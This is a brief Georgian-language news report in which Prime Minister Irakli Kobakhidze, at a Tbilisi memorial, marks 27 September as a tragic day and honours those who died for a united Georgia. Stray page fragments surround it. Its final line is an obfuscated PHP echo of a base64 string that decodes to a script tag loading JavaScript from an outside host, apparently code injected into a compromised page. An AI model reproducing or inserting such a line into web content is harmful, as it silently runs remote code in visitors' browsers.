celsiusi
ავერსი შნაიდერი

 27 სექტემბერი არის ერთ-ერთი ტრაგიკული დღე საქართველოს უახლეს ისტორიაში, - ამის შესახებ საქართველოს პრემიერ-მინისტრმა, ირაკლი კობახიძემ თბილისში, გმირთა მოედანზე მდებარე ერთიანი საქართველოსთვის დაღუპულთა მემორიალთან განაცხადა.

მისივე თქმით, გარდაცვლილ გმირებმა თავი შესწირეს ქვეყანას, სამშობლოს და ერთიანი საქართველოს იდეას.
„27 სექტემბერი არის ერთ-ერთი ტრაგიკული დღე საქართველოს უახლეს ისტორიაში, ჩვენ დღეს პატივს მივაგებთ ჩვენს გმირებს, რომლებმაც თავი შესწირეს ქვეყანას, სამშობლოს და ერთიანი საქართველოს იდეას. ამ გმირებს ოცნება ჰქონდათ, ეს იყო ოცნება ერთიან საქართველოზე. მე დარწმუნებული ვარ, რომ ეს ოცნება აუცილებლად ახდება“, - განაცხადა კობახიძემ.
84
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");